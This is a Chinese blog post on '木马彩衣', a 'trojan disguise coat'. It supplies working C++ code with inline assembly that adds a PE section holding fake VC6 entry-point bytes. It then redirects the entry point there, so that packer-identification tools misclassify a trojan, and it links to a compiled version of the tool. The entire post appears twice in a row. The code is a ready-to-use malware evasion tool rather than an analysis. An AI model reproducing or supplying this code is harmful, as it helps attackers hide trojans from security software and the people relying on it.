木马彩衣的原理和代码示例
木马彩衣的实现原理,也就是在程序里面加多一个Section,并且把入口点指向我们新添加的Section,然后再在我们的Section的代码里加上一个jmp,jmp到真正的入口点.这样,一些识壳软件,它在识别入口点代码时,就跑到我们新加的Section,看到里面的代码是VC6或是Delphi的代码也就认为是VC6或是Delphi的程序了.
下面是我写的一个代码,修改自"Fi7ke"老大的Delphi代码,原文可以查看http://blog.csdn.net/hnxyy/archive/2005/11/16/530694.aspx
DWORD JMPOFF=43;
char OEPCODE[]={0x55, 0x8B, 0xEC, 0x6A, 0xFF, 0x68, 0x2A, 0x2C, 0x0A, 0x00, 0x68, 0x38,
0x90, 0x0D, 0x00, 0x64, 0xA1, 0x00, 0x00, 0x00, 0x00, 0x50, 0x64, 0x89,
0x25, 0x00, 0x00, 0x00, 0x00, 0x58, 0x64, 0xA3, 0x00, 0x00, 0x00, 0x00,
0x58, 0x58, 0x58, 0x58, 0x8B, 0xE8, 0xB8,
0x00, 0x10, 0x40, 0x00, //此处的DWORD是跳转的地址
0xFF,0xE0, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00};
//加壳
void Encrypt(LPCSTR szFileName)
{
//var
IMAGE_DOS_HEADER DosHeader;
IMAGE_NT_HEADERS PEHeader;
IMAGE_SECTION_HEADER SectionHeader;
//新添加的Section
IMAGE_SECTION_HEADER MySectionHeader;
//入口点地址
DWORD AddressOfEntryPoint;
//文件流
CFile PEFile;
//begin
try
{
PEFile.Open(szFileName,CFile::modeReadWrite);
//读取DOS头
PEFile.SeekToBegin();
PEFile.Read(&DosHeader,sizeof(DosHeader));
//读取NT头
PEFile.Seek(DosHeader.e_lfanew,CFile::begin);
PEFile.Read(&PEHeader,sizeof(PEHeader));
//读取Section
PEFile.Seek(sizeof(IMAGE_SECTION_HEADER)*(PEHeader.FileHeader.NumberOfSections-1),CFile::current);
PEFile.Read(&SectionHeader,sizeof(IMAGE_SECTION_HEADER));
strncpy((LPSTR)MySectionHeader.Name,"Fi7ke/0",6);
MySectionHeader.VirtualAddress = PEHeader.OptionalHeader.SizeOfImage;
MySectionHeader.Misc.VirtualSize = 0x200;
MySectionHeader.SizeOfRawData = (MySectionHeader.VirtualAddress / //div
PEHeader.OptionalHeader.FileAlignment + 1) * PEHeader.OptionalHeader.FileAlignment -
PEHeader.OptionalHeader.SizeOfImage;
MySectionHeader.PointerToRawData =SectionHeader.SizeOfRawData + SectionHeader.PointerToRawData;
MySectionHeader.Characteristics = 0x60000020;
PEHeader.FileHeader.NumberOfSections++;
PEFile.Write(&MySectionHeader, sizeof(MySectionHeader));
PEFile.Seek(DosHeader.e_lfanew, CFile::begin);
AddressOfEntryPoint = PEHeader.OptionalHeader.AddressOfEntryPoint;
PEHeader.OptionalHeader.AddressOfEntryPoint =MySectionHeader.VirtualAddress;
PEHeader.OptionalHeader.MajorLinkerVersion = 6;
PEHeader.OptionalHeader.MinorLinkerVersion = 0;
AddressOfEntryPoint = AddressOfEntryPoint + PEHeader.OptionalHeader.ImageBase;
__asm
{
PUSHAD
LEA eax, OEPCODE //将OEPCODE的地址交给寄存器
ADD eax, JMPOFF //添加JMPOFF值给寄存器
MOV edx, AddressOfEntryPoint //转移指令,相当于付值语句,左边给右边
MOV DWORD ptr [eax], edx //同上
POPAD
}
PEHeader.OptionalHeader.SizeOfImage =PEHeader.OptionalHeader.SizeOfImage + MySectionHeader.Misc.VirtualSize;
PEFile.Write(&PEHeader, sizeof(PEHeader));
PEFile.SeekToEnd();
PEFile.Write(OEPCODE, MySectionHeader.Misc.VirtualSize);
PEFile.Close();
}
catch (...)
{
PEFile.Close();
}
}
[CODE]
这个是编译后的程序,放在网络硬盘上.使用时,直接点"加壳"就行了.
http://free.ys168.com:8000/ys168up/D2/?Mini木马彩衣.exey70z71fdp9f9b0b1z95bi2b2b2b2b0fq9fd1b4f9b0f6e01e20e01e24b1b1f2b0b1f9flc4fd7z
下面是我写的一个代码,修改自"Fi7ke"老大的Delphi代码,原文可以查看http://blog.csdn.net/hnxyy/archive/2005/11/16/530694.aspx
DWORD JMPOFF=43;
char OEPCODE[]={0x55, 0x8B, 0xEC, 0x6A, 0xFF, 0x68, 0x2A, 0x2C, 0x0A, 0x00, 0x68, 0x38,
0x90, 0x0D, 0x00, 0x64, 0xA1, 0x00, 0x00, 0x00, 0x00, 0x50, 0x64, 0x89,
0x25, 0x00, 0x00, 0x00, 0x00, 0x58, 0x64, 0xA3, 0x00, 0x00, 0x00, 0x00,
0x58, 0x58, 0x58, 0x58, 0x8B, 0xE8, 0xB8,
0x00, 0x10, 0x40, 0x00, //此处的DWORD是跳转的地址
0xFF,0xE0, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00};
//加壳
void Encrypt(LPCSTR szFileName)
{
//var
IMAGE_DOS_HEADER DosHeader;
IMAGE_NT_HEADERS PEHeader;
IMAGE_SECTION_HEADER SectionHeader;
//新添加的Section
IMAGE_SECTION_HEADER MySectionHeader;
//入口点地址
DWORD AddressOfEntryPoint;
//文件流
CFile PEFile;
//begin
try
{
PEFile.Open(szFileName,CFile::modeReadWrite);
//读取DOS头
PEFile.SeekToBegin();
PEFile.Read(&DosHeader,sizeof(DosHeader));
//读取NT头
PEFile.Seek(DosHeader.e_lfanew,CFile::begin);
PEFile.Read(&PEHeader,sizeof(PEHeader));
//读取Section
PEFile.Seek(sizeof(IMAGE_SECTION_HEADER)*(PEHeader.FileHeader.NumberOfSections-1),CFile::current);
PEFile.Read(&SectionHeader,sizeof(IMAGE_SECTION_HEADER));
strncpy((LPSTR)MySectionHeader.Name,"Fi7ke/0",6);
MySectionHeader.VirtualAddress = PEHeader.OptionalHeader.SizeOfImage;
MySectionHeader.Misc.VirtualSize = 0x200;
MySectionHeader.SizeOfRawData = (MySectionHeader.VirtualAddress / //div
PEHeader.OptionalHeader.FileAlignment + 1) * PEHeader.OptionalHeader.FileAlignment -
PEHeader.OptionalHeader.SizeOfImage;
MySectionHeader.PointerToRawData =SectionHeader.SizeOfRawData + SectionHeader.PointerToRawData;
MySectionHeader.Characteristics = 0x60000020;
PEHeader.FileHeader.NumberOfSections++;
PEFile.Write(&MySectionHeader, sizeof(MySectionHeader));
PEFile.Seek(DosHeader.e_lfanew, CFile::begin);
AddressOfEntryPoint = PEHeader.OptionalHeader.AddressOfEntryPoint;
PEHeader.OptionalHeader.AddressOfEntryPoint =MySectionHeader.VirtualAddress;
PEHeader.OptionalHeader.MajorLinkerVersion = 6;
PEHeader.OptionalHeader.MinorLinkerVersion = 0;
AddressOfEntryPoint = AddressOfEntryPoint + PEHeader.OptionalHeader.ImageBase;
__asm
{
PUSHAD
LEA eax, OEPCODE //将OEPCODE的地址交给寄存器
ADD eax, JMPOFF //添加JMPOFF值给寄存器
MOV edx, AddressOfEntryPoint //转移指令,相当于付值语句,左边给右边
MOV DWORD ptr [eax], edx //同上
POPAD
}
PEHeader.OptionalHeader.SizeOfImage =PEHeader.OptionalHeader.SizeOfImage + MySectionHeader.Misc.VirtualSize;
PEFile.Write(&PEHeader, sizeof(PEHeader));
PEFile.SeekToEnd();
PEFile.Write(OEPCODE, MySectionHeader.Misc.VirtualSize);
PEFile.Close();
}
catch (...)
{
PEFile.Close();
}
}
[CODE]
这个是编译后的程序,放在网络硬盘上.使用时,直接点"加壳"就行了.
http://free.ys168.com:8000/ys168up/D2/?Mini木马彩衣.exey70z71fdp9f9b0b1z95bi2b2b2b2b0fq9fd1b4f9b0f6e01e20e01e24b1b1f2b0b1f9flc4fd7z